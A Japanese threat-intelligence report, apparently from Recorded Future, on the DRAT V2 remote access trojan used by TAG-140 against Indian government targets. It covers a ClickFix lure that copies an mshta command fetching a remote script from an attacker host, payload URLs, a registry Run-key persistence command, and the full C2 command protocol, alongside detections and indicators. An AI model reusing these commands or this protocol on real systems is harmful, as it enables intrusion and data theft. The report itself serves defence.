DRAT V2：TAG-140の武器庫に更新されたDRATが登場

Executive Summary

インド政府機関を標的とした最近のTAG-140キャンペーンの調査中に、Insikt GroupはDRATリモートアクセス型トロイの木馬（RAT）の改変された亜種を特定し、これをDRAT V2と命名しました。TAG-140は、Transparent Tribe（APT36、ProjectM、またはMYTHIC LEOPARDとしても追跡される）のサブクラスターまたは運用関連組織であると評価されている運用サブグループであるSideCopyと重複しています。TAG-140は、マルウェアアーセナルと配信テクニックにおいて、一貫して反復的な進化と多様性を示してきました。クローン化されたプレスリリースポータルを通じてインド国防省を偽装したこの最新のキャンペーンは、マルウェアのアーキテクチャとコマンド＆コントロール（C2）機能の両方において、わずかではありますが、注目すべき変化を示しています。

DRAT V2の導入はTAG-140によるリモートアクセスツールの継続的な微調整を反映しており、.NETベースのバージョンのDRATから新しいDelphiコンパイル型の亜種に移行します。どちらのバージョンも、CurlBack、SparkRAT、AresRAT、Xeno RAT、AllaKore、ReverseRATなど、このグループが利用してきた多数のRATの間で、マルウェアを入れ替えながら使用しているパターンを示しています。DRAT V2は、カスタムのTCPベースでサーバーが開始するC2プロトコルを更新し、任意のシェルコマンドの実行や強化されたファイルシステムの操作などの機能を拡張します。

感染チェーンの分析によると、最初のアクセスはClickFixスタイルのソーシャルエンジニアリングルアーによって達成されました。被害者はmshta.exeを介して悪意のあるスクリプトを実行するように誘導され、これにより、TAG-140によって以前使用されていたBroaderAspect .NETローダーが実行されました。BroaderAspectは永続性を確立し、それに続いてDRAT V2のインストールと実行を行います。

Insikt Groupは、ドメインの重複、マルウェアの系統、インフラストラクチャの特性に基づき、この活動がTAG-140によるものであると中程度の確信を持って判断しています。DRAT V2の機能強化は、被害者ネットワーク全体でのカスタマイズされたポストエクスプロイトおよび横方向の移動におけるTAG-140の能力が向上する可能性を示唆しています。したがって、その出現は、脅威アクターの成熟した知識と、インドの防衛機関および政府機関を戦略的に標的にしていることを示す重要な指標です。

主な調査結果

• DRAT V2では、任意のシェルコマンドを実行するための新しいコマンド（exec_this_comm）が追加され、エクスプロイト後の柔軟性が向上します。
• マルウェアは、簡単にデコードされないように、文字列を先頭に追加したBase64エンコードを用いてC2 IPアドレスを難読化します。
• 以前のバージョンと比較すると、DRAT V2は、ステルス性よりも解析の信頼性を優先し、コマンドヘッダーのほとんどを平文にすることで、文字列の難読化を軽減しています。
• DRAT V2は、カスタムサーバーが開始するTCPプロトコルを更新し、ASCIIとUnicodeの両方で入力されたコマンドをサポートしますが、応答はASCIIのみです。
• DRAT V2には高度な分析回避技術がなく、基本的な感染および永続化の方法に依存しているため、静的分析および動作分析によって検出可能です。

背景

TAG-140は、一般に報告されているSidecopyというグループと重複する脅威アクターグループです。Sidecopyは、パキスタンの国家と提携している疑いのあるAPT（高度な持続的脅威）グループで、Transparent Tribe（APT36、ProjectM、MYTHIC Leopardとしても追跡されています）のサブクラスターまたは運営関連組織であると評価されています。少なくとも2019年から活動しているTAG-140は、主にインドのエンティティを標的としており、最近の活動は従来の政府、防衛、海事、学術分野を超えて、現在では国の鉄道、石油・ガス、外務省に関連する組織にまで拡大しています。

このグループは、スピアフィッシングキャンペーンの活用、配布用のHTMLアプリケーション（HTA）またはMicrosoftインストーラー（MSI）パッケージの使用、ソフトウェアの脆弱性の悪用（WinRARなど）、CurlBack 、SparkRAT、AresRAT、Xeno RAT、AllaKore、ReverseRAT、DRATなどのさまざまなRATの使用など、その手法において一貫した進化を見せています（1、2、3）。これらの感染チェーンは通常、Windows環境とLinux環境の両方を標的にします。

Insikt Groupは、インド省庁を偽装した最近のClickFixキャンペーンのアーティファクトを分析し、その攻撃者がTAG-140脅威アクターによるものであることを確認しました。TAG-140は、正規の政府ウェブサイト（mod[.]gov[.]in）と非常に似ている悪意のあるドメイン（email[.]gov[.]in[.]drdosurvey[.]info）を使用して、インド国防省の公式プレスリリースポータルを模倣した偽造ウェブサイトを作成しました（urlscan.io）。複製されたウェブサイトは、本物のポータルの構造とレイアウトを再現し、2023年9月から2025年4月までのプレスリリースを一覧表示しています。ただし、アクティブだったのは2025年3月のリンクのみでした。

図1：複製された国防省ポータル（情報源：Hunt.io）

2025年3月のアクティブなリンクをクリックすると、ClickFixスタイルのソーシャルエンジニアリング攻撃が発動されました。Insikt Groupは、TAG-140 Windows感染チェーンをさらに分析し、2024年後半に確認されたTAG-140の活動に関するSeqrite Labsの調査で報告された感染チェーンと類似していると判断しました。感染チェーン（図2）を分析した結果、最終的なペイロードはDelphiベースの新しいDRATの亜種（DRAT V2と呼ばれる）であることが判明しました。以前、DRATは.NETで開発され、2023年にSideCopyの活動に初めて関連付けられました。更新された亜種には、新しいコマンド機能とわずかに変更されたC2プロトコルが含まれています。

図2：DRAT V2をドロップするTAG-140感染チェーン（情報源：Recorded Future）

1. ユーザーは以下のURL（urlscan.io）に誘導されます。使用された配信メカニズムは不明ですが、TAG-140のTTP（戦術、技術、手順）に基づくと、これはユーザーにリンクをクリックるスピアフィッシングメールとして配信される可能性が高いです。その後、ユーザーは「2025年3月リリース」のリンクをクリックするように誘導されます。Windowsマシンからそのリンクをクリックすると、ユーザーはURI（Uniform Resource Identifier）、/captcha/windows.phpにリダイレクトされます。

   hxxps://email[.]gov[.]in[.]drdosurvey[.]info/content/press-releases-ministry-defence-0.html

2. リダイレクトされたウェブサイト（urlscan.io）は「**開示 - 公式使用のみ（FOUO）**」という警告を表示し、ユーザーに「続行」をクリックするよう求めます。
3. 「Continue（続行）」をクリックすると、JavaScriptが実行され、以下の悪意のあるコマンドがクリップボードにコピーされ、コマンドシェルに貼り付けて実行するようユーザーに指示します。このコマンドは、mshta.exeを使用して、TAG-140のインフラストラクチャである「_trade4wealth[.]in_」からリモートスクリプト（index.php/sysinte.hta）を取得して実行します。

   const calcPath = "C:\\Windows\\System32\\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php"; navigator.clipboard.writeText(calcPath)

4. index.php/sysinte.htaの実行により、Seqrite Labsによって最初に報告されたBroaderAspectローダーが作成され、実行されます。BroaderAspectは以下のアクションを実行します。
   1. 次のURLから、おとり文書のsurvey.pdfをダウンロードして開きます。

      hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/01/survey.pdf

   2. Windowsバッチファイルのnoway.batを作成して実行します。これには、Microsoftが定義した自動起動場所にレジストリエントリーを追加することでDRAT V2の永続性を確立するコマンドが含まれています。

      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

   3. 次のURLからDRAT V2ペイロードをダウンロードして解凍します。

      Initial Request: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02 Redirect: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02/ayty.ert

   4. 以下のコマンドを使用してDRAT V2を実行します。

      C:\Windows\system32\cmd.exe /c cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Insikt Groupは、以下の点に基づき、中程度の確信を持ってこの活動がTAG-140によるものであると判断しています。

1. インド国防省などのインドの防衛組織を偽装して標的とする行為は、既知のTAG-140の標的と一致しています。
2. BroaderAspectローダーとDRAT（いずれかの亜種）の使用は、どちらもTAG-140（1、2）でのみ使用されているようで、TAG-140のTTP（戦術・技術・手順）と一致しています。
3. email[.]gov[.]in[.]drdosurvey[.]infoというドメインは、他のAPT36攻撃（1、2）と重複しており、ホスティングプロバイダーとしてNamecheapを使用しています。私たちは、複数の事例でTAG-140がNamecheap、GoDaddy、Hostingerを一般的に使用していることを確認しました（1、2、3、4）。
4. DRAT V2に加えて、TAG-140は以前にオープンソースのAllaKore RATなどのDelphiベースのマルウェアを使用していました。

技術的分析

DRAT V2はDelphiで開発された軽量RATであり、2023年にTAG-140に初めて関連付けられた以前の.NETベースの亜種の進化形です。DRAT V2では、前バージョンからいくつかの更新が導入されています。

• カスタムTCPサーバーが開始するC2プロトコルの更新
• 先頭に文字列を追加してC2インフラストラクチャのBase64難読化を強化
• 更新されたコマンドヘッダーと任意のWindowsコマンドを実行するための新しいコマンド

図3にDRAT V2の概要を示します。

図3：DRAT V2の概要（情報源：Recorded Future）

DRAT V2は、TAG-140オペレーターが侵害されたホストと多様な対話を行うことを可能にする一連のコマンドをサポートしています。通信が確立されると、マルウェアはC2サーバーからの指示を受動的に待ちます。サポートされている操作には、システムの偵察（ユーザー名、オペレーティングシステムのバージョン、システム時間、現在の作業ディレクトリの収集）、接続性の検証、ローカルファイルシステムおよびディレクトリの列挙が含まれます。

偵察のみならず、DRAT V2はターゲット環境とのより積極的な関与を可能にします。ホストとC2インフラストラクチャ間で双方向のファイル転送を可能にし、オペレーターが追加のペイロードをアップロードしたり、データを流出させたりすることができます。さらに、ローカルファイルと任意のWindowsシェルコマンドの実行をサポートし、出力をC2に返します。これらの機能により、TAG-140は感染したシステムを持続的かつ柔軟に制御し、補助的なマルウェアツールを展開することなく、自動化および対話型のポストエクスプロイト活動を可能にします。図4は、DRAT V2の機能概要を示しています。

図4：DRAT V2の機能マトリックス（情報源：Recorded Future）

DRAT V2 コマンド

DRAT V2は、侵害されたホストにおけるリモート制御機能をサポートするために、テキストベースのサーバー開始のカスタムTCPプロトコルであるコマンドインターフェースを引き続き使用します。構造化された形式を通じて、コマンドの実行、ファイルの操作、システムの偵察が可能です。

DRAT V2コマンドプロトコルは、区切り文字としてチルダ（~）とパイプ（|）文字を使用することで区別されます。C2インフラストラクチャとの接続が確立されると、マルウェアは受動状態に入り、サーバーからの指示を待機します。これらの命令は、ホスト偵察、ファイル管理、直接実行などの機能を含む9つの個別のコマンドタイプ（表1）にまたがります。各コマンドは決定論的な形式に従っており、オペレーターは一貫性を持ってオーバーヘッドを抑えつつ、侵害後のアクションを調整できます。

DRAT V2 コマンド	能力	説明
initial_infotonas	システム情報	このコマンドは、ユーザー名、OSバージョン、タイムスタンプ、作業ディレクトリなどのホスト環境の詳細を要求することにより、システムレベルの偵察を開始します。対応は7つのフィールドで構成されています。
sup	エコー/接続テスト	このコマンドは、侵害されたホストとのアクティブな通信を確認するために使用されます。
lst_of_sys_drvs	ボリューム一覧表示	このコマンドにより、DRAT V2はターゲットマシン上のアクセス可能な論理ドライブを列挙できます。
here_are_dir_details	ディレクトリとファイルを情報と共に一覧表示	このコマンドは、名前、サイズ、タイムスタンプ、パスなど、ディレクトリとファイルの構造化されたメタデータを取得します。特に、この実装には、フルパスが後続のエントリーと不適切に連結されるという欠陥があり、演算子の解析に影響を与える可能性があります。
filina_for_down	ファイルサイズ	このコマンドは、指定されたファイルのバイトサイズを取得するために使用されます。
file_upl	ファイルアップロード	このコマンドは、C2からターゲットホストへのファイル転送をサポートします。このコマンドは、ペイロードのステージングやセカンダリツールの展開を容易にするために、ファイルパスとサイズの両方を指定する必要があります。
this_filina_exec	ファイルの実行	このコマンドは、ホストシステム上で指定されたファイルを実行します。この機能により、ローカルファイルシステム内で追加のペイロードを配信したり、既存のバイナリを実行したりすることができます。
fil_down_confirmina	ファイルダウンロード	このコマンドは、被害者のシステムからC2サーバーへのファイルの流出を可能にします。他の対応とは異なり、応答ヘッダーは存在せず、生のファイル内容のみがC2に送信されます。
exec_this_comm	コマンドの実行	このコマンドは、感染したホスト上で任意のシェルコマンドの実行を許可します。これにより、インタラクティブな操作に大きな柔軟性が加わり、リアルタイムのタスク処理とオンデマンドでのポストエクスプロイト活動が可能になります。

表1：DRAT V2コマンド（情報源：Recorded Future）

このコマンドセットにより、TAG-140は、ホストの偵察、データステージング、潜在的な横方向の移動を含む、ポストエクスプロイトのさまざまな目的をサポートできます。特に、DRAT V2は任意のコマンド実行をサポートすることで、前バージョンの機能を拡張しています。付録Bには、パラメータを含む各コマンドの詳細な内訳が記載されています。

図5は、感染したホストとC2間の通信の例を示しています。この例では、C2サーバーがコマンド exec_this_comm~whoami を送信し、感染したホストに whoami コマンドを実行するように指示します。その後、感染したホストはコマンドの出力で応答します。

図5：Wiresharkで記録および表示されたDRAT V2コマンド実行要求パケットと対応パケット（情報源：Recorded Future）

DRAT vs DRAT V2

この比較分析では、オリジナルのDRATとDRAT V2の技術的および運用上の違いを強調しています。開発プラットフォームの移行は、マルウェアのコンパイル、実行、そして潜在的な検出方法に影響を与える重要なアーキテクチャの転換を示しています。両方の亜種は軽量RATとしての同様のコア機能を維持していますが、DRAT V2はコマンド構造、C2難読化技術、通信プロトコルにおいて重要な強化を導入し、文字列難読化の使用を最小限に抑えています。これらの適応は、TAG-140が回避能力、モジュール性、搾取後の作戦における柔軟性を向上させるために、ツールを進化させ続けていることを反映していると考えられます。

コマンドヘッダーのバリエーション

DRATの亜種はどちらもリモート管理用に同様のコマンドを実装していますが、各バージョンでコマンドヘッダーに異なる命名規則を使用します。たとえば、DRATのシステム情報コマンドはgetInformiticaとラベル付けされていますが、DRAT V2ではinitial_infotonasが使用されます。DRAT V2では、新しいコマンドexec_this_commも導入されました。これにより、感染したホストで任意のシェルコマンドを実行することが可能になります。これは元のDRATにはなかった拡張機能で、ポストエクスプロイト機能が拡張されたことを示しています。以下の比較表（表2）は、両バージョンのリクエストヘッダーと応答ヘッダーの詳細な行ごとの内訳を示しています。この表では、緑色で強調表示されたコマンドマッピングは、両方の亜種で機能的に保持されるコマンドを示し、黄色で強調表示された項目はDRAT V2専用の新しい追加項目を表します。

コマンド	DRAT コマンドヘッダー	DRAT V2 コマンドヘッダー
システム情報リクエスト	getInformitica	initial_infotonas
システム情報対応	informiticaBack|	my_ini_info|
エコー/接続テストリクエスト	sup	sup
エコー/接続テスト対応	supconfirm	hello_frm_me
ボリューム一覧表示リクエスト	ドライブリスト	lst_of_sys_drvs
ボリューム一覧表示対応	ドライブリスト	lst_of_sys_drvs
情報と共にディレクトリとファイルを一覧表示のリクエスト	enterPath	here_are_dir_details
情報と共にディレクトリとファイルを一覧表示への対応	enterPath	here_are_dir_details
ファイルサイズのリクエスト	fdl	filina_for_down
ファイルサイズ対応	fInfo	fileina_detailwa
ファイルアップロードのリクエスト	fup	file_upl
ファイルアップロードの対応	fupConfirm	file_upl_confrm
ファイル実行リクエスト	fupexec	this_filina_exec
ファイル実行対応	fupexecConfirm ファイルが実行されました	file_exec_confirm
ファイルダウンロードのリクエスト	fdlConfirm	fil_down_confirmina
コマンド実行リクエスト		exec_this_comm
コマンド実行対応		comm_resultwa
ファイルダウンロード対応	[File Content]	[File Content]

表2：DRATとDRAT V2のコマンド比較（情報源：Recorded Future）

C2 Communicationsにおけるテキストフォーマット

両方のバージョンは、C2インタラクションにテキストベースの通信プロトコルを活用しています。しかし、エンコード要件が異なります。DRAT V2はUnicodeとASCIIの両方でコマンドを受け付けますが、常にASCIIで応答します。一方、オリジナルのDRATは入力と出力のどちらにもUnicodeを義務付けています（図6）。

図6：Wiresharkで記録・表示されたDRAT V1のボリューム一覧表示のリクエストと対応（情報源：Recorded Future）

システム情報の相違点

互いのバージョンのシステム情報対応には多くの類似点がありますが、いくつかの違いがあります。たとえば、Unicodeのテキスト、異なるコマンドリクエストヘッダー、win-defの代わりにwin-def（どちらもハードコーディングされています）などがあります。最後に、システム情報対応におけるWindows バージョンの形式は、DRATとDRATV2の間で異なります。DRATはレジストリキー（Software\Microsoft\Windows NT\CurrentVersion\ProductName）から値を返しますが、DRAT V2はAPI呼び出し、GetVersionExW()を使用してWindowsバージョンを取得し、ソースコードでBase64エンコードされたカスタム文字列を返します。表3に、2つのコマンドの違いを示しています。

システム情報の構成要素	DRATシステム情報対応	DRAT V2システム情報対応
コマンド区切り	インバウンドリクエストの「~」（チルダ）文字以降のデータ	インバウンドリクエストの「~」（チルダ）文字以降のデータ
N.A フィールド	ハードコードされた「N.A」	ハードコードされた「N.A」
Usernameフィールド	SystemInformation.Username()を通じて取得したユーザー名	ユーザー名はSystem::Sysutils:: GetEnvironmentVariable("USERNAME")で取得されます
Windowsバージョンフィールド	Windowsバージョンの取得元：Software\Microsoft\Windows NT\CurrentVersion\ProductName 例：Windows 10 Pro	GetVersionExW()によって取得されたWindowsバージョンは、次のいずれかに翻訳されます。 V2luZG93cyAxMSBPUw== Windows 11 OS V2luZG93cyAxMCBPUw== Windows 10 OS V2luZG93cyA4IG9yIDEw Windows 8または10 V2luZG93cyA3IE9T Windows 7 OS VW5rbm93biBXaW5kb3dzIFZlcnNpb24= 不明な Windows バージョン
識別子フィールド	ハードコードされたWin Defender	ハードコードされたwin-def
日付/時刻スタンプフィールド	DateTime.Now.ToString()で取得した現在の日付と時刻（DD/MM/YYYY HH:MM:SS AM/PM形式）	SysUtils::Now()で取得した現在の日付と時刻（YYYY-MM-DD HH:MM:SS形式）
作業パスフィールド	作業ディレクトリの完全なパス	作業ディレクトリの完全なパス

表3：DRATとDRAT V2のシステム情報要求と対応フィールド（情報源：Recorded Future）

C2難読化の相違点

どちらのDRATの亜種でも、C2情報はBase64でエンコードされています。DRATはC2 IPアドレスを直接エンコードしますが、DRAT V2は、Base64エンコードの前に次の文字列のいずれかをIPアドレスの先頭に追加することで、C2の難読化手法を変更します。

• <><><><><><><><><><><>
• XXXXXXXXXXXXXXXXXXXXXX

プレフィックス付きのエンコードされたC2 IPの例：PD48Pjw+PD48Pjw+PD48Pjw+PD48PjE4NS4xMTcuOTAuMjEy プレフィックス付きのデコードされたC2 IPの例：185.117.90.212

これらの先頭に追加されるパターンは、初歩的な整合性チェックとして機能したり、アナリストや自動化ツールによる些細なデコードを防ぐのに役立つ可能性があります。

文字列の難読化

文字列の難読化戦略はバリアント間でも異なります。DRAT は、コマンドと操作文字列の両方をエンコードするために、置換アルゴリズムを使用したより広範な方式を採用しています。一方、DRAT V2 は、Windows バージョンや C2 情報などの文字列を選択的に難読化しますが、コマンドヘッダーはプレーンテキストのままにします。DRAT V2におけるこの限定的な難読化アプローチは、ステルス性と構文解析の信頼性の間のトレードオフを示している可能性があります。

検知

検知
Snort	DRATマルウェアのアウトバウンドC2通信の検出：これらのSnortルールを使用して、アウトバウンドDRATおよびDRAT V2 C2通信を検出します。
Sigma	実行キーを使用したTAG-140の永続性の検出：このSigmaルールを使用して、バッチファイルのコマンドに終了引用符がない場合に、レジストリの実行キーを作成して永続性を確立するTAG-140攻撃を検出します。
YARA	TAG-140によって使用されるBroaderAspect Loaderを検出：このYARAルールを使用して、BroaderAspectマルウェアに関連する文字列を含むファイルを検出します。対象ファイルには、.pdfや.batが含まれます。ファイル拡張子と特定のマルウェア識別子。 TAG-140が使用するDRATマルウェアのDotNetおよびDelphiの亜種を検出するには、これらのYARAルールを使用してDRATおよびDRAT V2を検出します。

軽減策

• 3232、6372、7771など、DRAT V2がC2操作に使用する一般的でない宛先ポートへのアウトバウンドTCP接続をブロックまたは監視します。大きな番号のポートを狙う、既知のプロトコルに一致しない異常なTCPトラフィックを監視します。
• ネットワークトラフィックを検査し、Base64、ASCII、またはUnicode形式でエンコードされたアウトバウンドコマンド対応とインバウンドシェルコマンド指示（付録B）を確認します。特に通常とは異なるポートに確立されたTCPセッションにおいて、トラフィックのデコードと検査に重点を置きます。
• このレポートの検知ルールを使用して、レジストリ実行キー、ファイルベースのローダー、エンコードされたC2パターンを介してDRAT V2の実行と永続性を特定します。カスタムのYARAルールを展開し、.NETおよびDelphiでコンパイルされたDRATサンプルを両方とも検出します。
• を監視する検知ロジックを展開してリモートスクリプトを起動したり、セカンダリペイロードを起動したりします。これは感染チェーンにおける重要なコンポーネントであり、悪意のあるHTAスクリプトがBroaderAspectなどのDRATローダーを取得して起動します。
• 特に、HKCUSOFTWARE\Microsoft Windows CurrentVersion\Runに関わるレジストリ変更イベントを監視します。TAG-140は、C:\Users\Public</span>内の偽装されたファイル名を使用してDRAT V2を実行し、永続性を確保します。

今後の展望

TAG-140によるDRAT V2の導入は、同グループの長年の慣行である、幅広く互換性のあるリモートアクセス型トロイの木馬スイートの維持と一致しています。この継続的な多様化は、アトリビューション、検知、監視活動を複雑にしています。DRAT V2は決定的な進化ではなく、別のモジュールの追加であるように見えます。これにより、TAG-140がキャンペーン間でRATをローテーションし続け、署名を隠蔽し、運用の柔軟性を維持する可能性が高まります。

これらの課題にもかかわらず、DRAT V2 感染チェーンは、防御回避や分析回避技術の使用が限られています。コードの難読化、サンドボックス回避、または複雑なローダーの動作がないことにより、基本的なテレメトリと静的分析を通じて早期検知の可能性が高まります。セキュリティチームは、マルウェアツールや感染チェーンにおける継続的な実験を予測しておく必要があります。TAG-140の活動の可視性を維持するためには、特定のマルウェアファミリーではなく、スピアフィッシングインフラストラクチャ、ローダーの再利用、行動指標を監視することが重要です。

付録A：侵害を示す指標

DRAT V2 ce98542131598b7af5d8aa546efe8c33a9762fb70bff4574227ecaed7fff8802 0d68012308ea41c6327eeb73eea33f4fb657c4ee051e0d40a3ef9fc8992ed316 c73d278f7c30f8394aeb2ecbf8f646f10dcff1c617e1583c127e70c871e6f8b7 DRAT 830cd96aba6c328b1421bf64caa2b64f9e24d72c7118ff99d7ccac296e1bf13d c328cec5d6062f200998b7680fab4ac311eafaf805ca43c487cda43498479e60 DRAT V2 C2 185[.]117[.]90[.]212:7771 154[.]38[.]175[.]83:3232 178[.]18[.]248[.]36:6372 DRAT C2 38[.]242[.]149[.]89:61101

付録B：DRAT V2コマンドパラメータと対応

システム情報

initial_infotonasコマンドは、ユーザー名、OSバージョン、タイムスタンプ、作業ディレクトリなどのホスト環境の詳細を要求することにより、システムレベルの偵察を開始します。対応は7つのフィールドで構成されています。

システム情報リクエストヘッダー	パラメータ	パラメータの説明
initial_infotonas	1	不明：連続番号が観測されました

システム情報対応ヘッダー	パラメータ	パラメータの説明
my_ini_info|	7	1：インバウンドリクエストの「~」（チルダ）文字以降のデータ 2: ハードコードされた文字列"N.A" 3：System::Sysutils::GetEnvironmentVariable("USERNAME")を使用してユーザー名を取得 4：GetVersionExW()によって取得されたWindowsバージョンは、次のいずれかに変換され、ソースコード内でBase64エンコードされます。 Windows 11 OS Windows 10 OS Windows 8または10 Windows 7 OS 不明な Windows バージョン 5：ハードコードされた文字列 win-def 6：System::SysUtils::Now()で取得した、YYYY-MM-DD HH:MM:SS形式の現在の日付と時刻 7：作業ディレクトリのフルパス

エコー/接続テスト

supコマンドは、侵害されたホストとのアクティブな通信を確認するために使用されます。

エコー/接続テストリクエストヘッダー	パラメータ	パラメータの説明
sup	0

コマンド実行対応ヘッダー	パラメータ	パラメータの説明
hello_frm_me	0

ボリューム一覧表示

lst_of_sys_drvsコマンドを使用すると、DRAT V2はターゲットマシン上のアクセス可能な論理ドライブを列挙できます。

ボリューム一覧表示リクエストヘッダー	パラメータ	パラメータの説明
lst_of_sys_drvs	0

ボリューム一覧表示対応ヘッダー	パラメータ	パラメータの説明
lst_of_sys_drvs	1	次の形式でのボリュームの一覧表示： [volume letter 1]:\1000000\r\n[volume letter 2]1000000\r\n[volume letter n]1000000\r\

属性を含むディレクトリを一覧表示

here_are_dir_detailsコマンドは、名前、サイズ、タイムスタンプ、パスなど、ディレクトリとファイルの構造化されたメタデータを取得します。特に、この実装には、フルパスが後続のエントリーと不適切に連結されるという欠陥があり、演算子の解析に影響を与える可能性があります。

ディレクトリ一覧表示リクエストヘッダー	パラメータ	パラメータの説明
here_are_dir_details	1	ディレクトリパス

ディレクトリ一覧表示対応ヘッダー	パラメータ	パラメータの説明
here_are_dir_details	1	次の形式で属性を持つサブディレクトリとファイルのリスト（「+」区切り）： ディレクトリまたはファイル名 ファイルサイズ（バイト単位）またはディレクトリの場合は「N/A」 ファイルのタイムスタンプはSysutils::FileAge、ディレクトリの場合はデフォルトの1899-12-29 00:00:00を使用 フルパス

ファイルサイズ

filina_for_downコマンドは、指定されたファイルのバイトサイズを取得するために使用されます。

ファイルサイズリクエストヘッダー	パラメータ	パラメータの説明
filina_for_down	1	ファイルパス

ファイルサイズ対応ヘッダー	パラメータ	パラメータの説明
fileina_detailwa	1	バイト数で示されたファイルのサイズ

ファイルアップロード

file_upl~コマンドは、C2からターゲットホストへのファイル転送をサポートします。このコマンドは、ペイロードのステージングやセカンダリツールの展開を容易にするために、ファイルパスとサイズの両方を指定する必要があります。

ファイルアップロードリクエストヘッダー	パラメータ	パラメータの説明
fil_upl~	2	ファイルパスとサイズ

ファイルアップロード対応ヘッダー	パラメータ	パラメータの説明
fil_upl_confrm	0

ファイルの実行

this_filina_execコマンドは、ホストシステム上で指定されたファイルを実行します。この機能により、ローカルファイルシステム内で追加のペイロードを配信したり、既存のバイナリを実行したりすることができます。

ファイル実行リクエストヘッダー	パラメータ	パラメータの説明
this_filina_exec	1	実行するファイルのフルパス

ファイル実行対応

file_exec_confirm

ファイルダウンロード

fil_down_confirminaコマンドは、被害者のシステムからC2サーバーへのファイルの流出を可能にします。他の対応とは異なり、応答ヘッダーは存在せず、生のファイル内容のみがC2に送信されます。

ファイルダウンロードリクエストヘッダー	パラメータ	パラメータの説明
fil_down_confirmina	1	ダウンロードするファイルのフルパス

ファイルダウンロード対応ヘッダー	パラメータ	パラメータの説明
ヘッダーがありません	0	生ファイルの内容

コマンドの実行

exec_this_commコマンドは、感染したホスト上で任意のシェルコマンドの実行を許可します。これにより、インタラクティブな操作に大きな柔軟性が加わり、リアルタイムのタスク処理とオンデマンドでのポストエクスプロイト活動が可能になります。

コマンド実行リクエストヘッダー	パラメータ	パラメータの説明
exec_this_comm	1	Windowsコマンド

コマンド実行対応ヘッダー	パラメータ	パラメータの説明
comm_resultwa	1	要求されたWindowsコマンドの対応

分析全文を読むには、ここをクリックしてレポートをPDF形式でダウンロードしてください。